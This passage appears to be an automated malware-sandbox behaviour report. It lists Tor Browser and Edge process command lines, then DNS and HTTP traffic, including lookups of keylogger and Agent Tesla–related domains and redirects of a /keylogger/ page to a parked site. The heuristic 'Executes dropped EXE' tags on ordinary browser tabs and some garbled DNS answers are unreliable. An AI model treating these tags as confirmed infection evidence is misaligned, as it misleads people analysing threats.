    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=8484 -childID 17 -isForBrowser -prefsHandle 8304 -prefMapHandle 8300 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7789f062-2f08-49a7-bca1-c277be714b30} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6904
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=9452 -childID 18 -isForBrowser -prefsHandle 10212 -prefMapHandle 8304 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {cc076a39-cf11-45cc-b931-55a0d25979ff} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:7324
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=9440 -childID 19 -isForBrowser -prefsHandle 7316 -prefMapHandle 10236 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {70b0883e-23ca-4281-b915-55c4c0a1ad14} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:7352
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=9584 -childID 20 -isForBrowser -prefsHandle 7276 -prefMapHandle 9432 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {af44c73e-2bf5-4efd-98b1-a327e64b2218} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:7380
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=6420 -childID 21 -isForBrowser -prefsHandle 5988 -prefMapHandle 5492 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {fc0fe274-f723-442d-ad11-e65b4b1c87b7} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:8112
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=6984 -childID 22 -isForBrowser -prefsHandle 6424 -prefMapHandle 5748 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {4e952364-22ff-4be0-99ee-ec4447817c0c} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:8140
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=6776 -childID 23 -isForBrowser -prefsHandle 6956 -prefMapHandle 6988 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {0df28101-1ef5-4627-b8e1-b5c050d8be55} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:8168
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=12452 -childID 24 -isForBrowser -prefsHandle 6232 -prefMapHandle 7488 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {5657d217-c141-4e46-8714-843b891ade12} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6500
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=13660 -childID 25 -isForBrowser -prefsHandle 13668 -prefMapHandle 13672 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {3388ea61-828f-4ba2-b1aa-2b260cc98213} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6852
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=14156 -childID 26 -isForBrowser -prefsHandle 14148 -prefMapHandle 14144 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {19228578-fd6d-4668-b0aa-c88b267ac9e4} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:7320
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=13380 -parentBuildID 20241125154204 -sandboxingKind 1 -prefsHandle 14316 -prefMapHandle 14324 -prefsLen 26060 -prefMapSize 252047 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {8a2bc850-ee5d-4bea-a035-7bc713e7854e} 3508 utility
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:7912
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=10120 -childID 27 -isForBrowser -prefsHandle 11360 -prefMapHandle 9824 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {c4ec55bc-331b-4d5a-85ca-403a1ef5ff3c} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:8216
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=9012 -childID 28 -isForBrowser -prefsHandle 13936 -prefMapHandle 7344 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {6ffc9aa6-a468-4776-bd13-06c8a628eba2} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:8920
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=536 -childID 29 -isForBrowser -prefsHandle 4732 -prefMapHandle 1820 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {5ca6b557-23be-4596-a59b-05a4c7fb4fa4} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:7076
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=8336 -childID 30 -isForBrowser -prefsHandle 4304 -prefMapHandle 10804 -prefsLen 24723 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {c389f213-7f76-49f1-9aad-3b84c631508e} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:8028
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=10732 -childID 31 -isForBrowser -prefsHandle 4128 -prefMapHandle 6268 -prefsLen 25071 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {c86e1632-b26d-442d-b179-2168223747b2} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6716
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=5512 -childID 32 -isForBrowser -prefsHandle 5320 -prefMapHandle 5708 -prefsLen 25071 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {fefa2161-2256-415d-8ecf-21c6aa2f81d8} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:6960
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=10504 -childID 33 -isForBrowser -prefsHandle 9816 -prefMapHandle 11524 -prefsLen 25071 -prefMapSize 252047 -jsInitHandle 1348 -jsInitLen 234780 -parentBuildID 20241125154204 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2adb1b2f-4abd-4f85-9136-738e783cca9e} 3508 tab
        5⤵
        Executes dropped EXE
        
        PID:8748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,3319260381204694044,7359418100600982274,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6792 /prefetch:2
  2⤵
  PID:2740

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4056

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2944

Network

DNS

www.ardamax.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.ardamax.com

IN A

Response

www.ardamax.com

IN A

172.234.222.138

www.ardamax.com

IN A

172.234.222.143
DNS

ctldl.windowsupdate.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

ctldl.windowsupdate.com.delivery.microsoft.com

ctldl.windowsupdate.com.delivery.microsoft.com

IN CNAME

wu-b-net.trafficmanager.net

wu-b-net.trafficmanager.net

IN CNAME

bg.microsoft.map.fastly.net

bg.microsoft.map.fastly.net

IN A

199.232.210.172

bg.microsoft.map.fastly.net

IN A

199.232.214.172
DNS

ocsp.digicert.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
DNS

8.8.8.8.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

oneocsp.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

oneocsp.microsoft.com

IN A

Response

oneocsp.microsoft.com

IN CNAME

oneocsp-microsoft-com.a-0003.a-msedge.net

oneocsp-microsoft-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net

a-0003.a-msedge.net

IN A

204.79.197.203
DNS

174.179.52.72.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

174.179.52.72.in-addr.arpa

IN PTR

Response

174.179.52.72.in-addr.arpa

IN PTR

lb01 parklogiccom
DNS

partner.googleadservices.com

msedge.exe

Remote address:

8.8.8.8:53

Request

partner.googleadservices.com

IN A

Response

partner.googleadservices.com

IN A

142.250.179.226
DNS

226.179.250.142.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

226.179.250.142.in-addr.arpa

IN PTR

Response

226.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f21e100net
DNS

227.16.217.172.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

227.16.217.172.in-addr.arpa

IN PTR

Response

227.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f31e100net

227.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f3�H
DNS

self.events.data.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdeus04.eastus.cloudapp.azure.com

onedscolprdeus04.eastus.cloudapp.azure.com

IN A

52.168.112.67
DNS

nav.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A

Response

nav.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-nav.trafficmanager.net

prod-atm-wds-nav.trafficmanager.net

IN CNAME

prod-agic-uw-2.ukwest.cloudapp.azure.com

prod-agic-uw-2.ukwest.cloudapp.azure.com

IN A

51.140.244.186
DNS

roaming.officeapps.live.com

msedge.exe

Remote address:

8.8.8.8:53

Request

roaming.officeapps.live.com

IN A

Response

roaming.officeapps.live.com

IN CNAME

prod.roaming1.live.com.akadns.net

prod.roaming1.live.com.akadns.net

IN CNAME

eur.roaming1.live.com.akadns.net

eur.roaming1.live.com.akadns.net

IN CNAME

neu-azsc-000.roaming.officeapps.live.com

neu-azsc-000.roaming.officeapps.live.com

IN CNAME

osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com

osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com

IN A

52.109.76.243
DNS

243.76.109.52.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

243.76.109.52.in-addr.arpa

IN PTR

Response
DNS

metadata.templates.cdn.office.net

msedge.exe

Remote address:

8.8.8.8:53

Request

metadata.templates.cdn.office.net

IN A

Response

metadata.templates.cdn.office.net

IN CNAME

templatesmetadata.office.net

templatesmetadata.office.net

IN CNAME

templatesmetadata.office.net.edgekey.net

templatesmetadata.office.net.edgekey.net

IN CNAME

e26769.dscb.akamaiedge.net

e26769.dscb.akamaiedge.net

IN A

92.123.26.217

e26769.dscb.akamaiedge.net

IN A

92.123.26.202
DNS

235.137.73.23.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

235.137.73.23.in-addr.arpa

IN PTR

Response

235.137.73.23.in-addr.arpa

IN PTR

a23-73-137-235deploystaticakamaitechnologiescom
DNS

188.108.11.51.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

188.108.11.51.in-addr.arpa

IN PTR

Response
DNS

nav.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A

Response

nav.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-nav.trafficmanager.net

prod-atm-wds-nav.trafficmanager.net

IN CNAME

prod-agic-uw-3.ukwest.cloudapp.azure.com

prod-agic-uw-3.ukwest.cloudapp.azure.com

IN A

51.11.108.188
DNS

nav.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A
DNS

nav.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A
DNS

nav.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A
GET

http://www.ardamax.com/keylogger/

msedge.exe

Remote address:

172.234.222.138:80

Request

GET /keylogger/ HTTP/1.1
Host: www.ardamax.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 302 Moved Temporarily

Server: openresty
Date: Wed, 04 Dec 2024 09:59:58 GMT
Content-Type: text/html
Content-Length: 142
Connection: keep-alive
Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
Location: http://ww99.ardamax.com/keylogger/
Cache-Control: no-store, max-age=0
GET

http://ww99.ardamax.com/keylogger/

msedge.exe

Remote address:

72.52.179.174:80

Request

GET /keylogger/ HTTP/1.1
Host: ww99.ardamax.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 302 Moved Temporarily

Date: Wed, 04 Dec 2024 09:59:59 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
DNS

20.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.160.190.20.in-addr.arpa

IN PTR

Response
DNS

ww7.ardamax.com

Remote address:

8.8.8.8:53

Request

ww7.ardamax.com

IN A

Response

ww7.ardamax.com

IN CNAME

76899.bodis.com

76899.bodis.com

IN A

199.59.243.227
DNS

228.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.16.217.172.in-addr.arpa

IN PTR

Response

228.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f41e100net

228.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f4�H
DNS

www.google.com

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.16.228
DNS

3.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
DNS

www.agenttesla.com

Remote address:

8.8.8.8:53

Request

www.agenttesla.com

IN A

Response

www.agenttesla.com

IN A

154.197.79.12
DNS

www.agenttesla.com

Remote address:

8.8.8.8:53

Request

www.agenttesla.com

IN A

Response

www.agenttesla.com

IN A

154.197.79.12
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

nav.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A

Response

nav.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-nav.trafficmanager.net

prod-atm-wds-nav.trafficmanager.net

IN CNAME

prod-agic-uw-2.ukwest.cloudapp.azure.com

prod-agic-uw-2.ukwest.cloudapp.azure.com

IN A

51.140.244.186
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

syndicatedsearch.goog

Remote address:

8.8.8.8:53

Request

syndicatedsearch.goog

IN A

Response

syndicatedsearch.goog

IN A

216.58.201.110
DNS

www.gstatic.com

Remote address:

8.8.8.8:53

Request

www.gstatic.com

IN A

Response

www.gstatic.com

IN A

142.250.178.3
DNS

fonts.gstatic.com

Remote address:

8.8.8.8:53

Request

fonts.gstatic.com

IN A

Response

fonts.gstatic.com

IN A

172.217.16.227
DNS

ctldl.windowsupdate.com

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

ctldl.windowsupdate.com.delivery.microsoft.com

ctldl.windowsupdate.com.delivery.microsoft.com

IN CNAME

wu-b-net.trafficmanager.net

wu-b-net.trafficmanager.net

IN CNAME

bg.microsoft.map.fastly.net

bg.microsoft.map.fastly.net

IN A

199.232.210.172

bg.microsoft.map.fastly.net

IN A

199.232.214.172
DNS

config.edge.skype.com

Remote address:

8.8.8.8:53

Request

config.edge.skype.com

IN A

Response

config.edge.skype.com

IN CNAME

config.edge.skype.com.trafficmanager.net

config.edge.skype.com.trafficmanager.net

IN CNAME

l-0007.config.skype.com

l-0007.config.skype.com

IN CNAME

config-edge-skype.l-0007.l-msedge.net

config-edge-skype.l-0007.l-msedge.net

IN CNAME

l-0007.l-msedge.net

l-0007.l-msedge.net

IN A

13.107.42.16
DNS

officeclient.microsoft.com

Remote address:

8.8.8.8:53

Request

officeclient.microsoft.com

IN A

Response

officeclient.microsoft.com

IN CNAME

config.officeapps.live.com

config.officeapps.live.com

IN CNAME

prod.configsvc1.live.com.akadns.net

prod.configsvc1.live.com.akadns.net

IN CNAME

europe.configsvc1.live.com.akadns.net

europe.configsvc1.live.com.akadns.net

IN CNAME

ukw-azsc-config.officeapps.live.com

ukw-azsc-config.officeapps.live.com

IN A

52.109.32.97
DNS

97.32.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.32.109.52.in-addr.arpa

IN PTR

Response
DNS

23.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.173.189.20.in-addr.arpa

IN PTR

Response
DNS

217.26.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.26.123.92.in-addr.arpa

IN PTR

Response

217.26.123.92.in-addr.arpa

IN PTR

a92-123-26-217deploystaticakamaitechnologiescom
DNS

nav.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A

Response

nav.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-nav.trafficmanager.net

prod-atm-wds-nav.trafficmanager.net

IN CNAME

prod-agic-uw-3.ukwest.cloudapp.azure.com

prod-agic-uw-3.ukwest.cloudapp.azure.com

IN A

51.11.108.188
DNS

config.edge.skype.com

Remote address:

8.8.8.8:53

Request

config.edge.skype.com

IN A

Response

config.edge.skype.com

IN CNAME

config.edge.skype.com.trafficmanager.net

config.edge.skype.com.trafficmanager.net

IN CNAME

l-0007.config.skype.com

l-0007.config.skype.com

IN CNAME

config-edge-skype.l-0007.l-msedge.net

config-edge-skype.l-0007.l-msedge.net

IN CNAME

l-0007.l-msedge.net

l-0007.l-msedge.net

IN A

13.107.42.16
DNS

config.edge.skype.com

Remote address:

8.8.8.8:53

Request

config.edge.skype.com

IN A
DNS

config.edge.skype.com

Remote address:

8.8.8.8:53

Request

config.edge.skype.com

IN A
DNS

config.edge.skype.com

Remote address:

8.8.8.8:53

Request

config.edge.skype.com

IN A
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiR3h6MktaQndHWTg9Iiwia2V5IjoiZWhuaG5FR2RyUkI0Q2hZbjd4V3J6dz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1701
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 09:59:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 834
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiWXZBeVc1VDIxM3M9Iiwia2V5IjoiOUViejRxdlk1T0FJUlVGSUdPbHhRdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2673
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:00:14 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 2945
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiQ2hveDJuWWdUR3c9Iiwia2V5IjoieUV0TE1sNzh2VnY1aFAybzhhZTVjdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1762
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 09:59:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 841
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiKzl0YzlTRThEQnM9Iiwia2V5IjoibThuelhGbkNoZzEwWVdQZTNrRzVtdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1306
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 09:59:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 192
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoielZhcU1jMWw1VXM9Iiwia2V5IjoicWs2VDg3YkhSUGN0SUxzR2Q0bDdvUT09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2558
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 09:59:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 2694
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
GET

http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727

msedge.exe

Remote address:

199.59.243.227:80

Request

GET /keylogger/?usid=19&utid=19445573727 HTTP/1.1
Host: ww7.ardamax.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 09:59:59 GMT
content-type: text/html; charset=utf-8
content-length: 1146
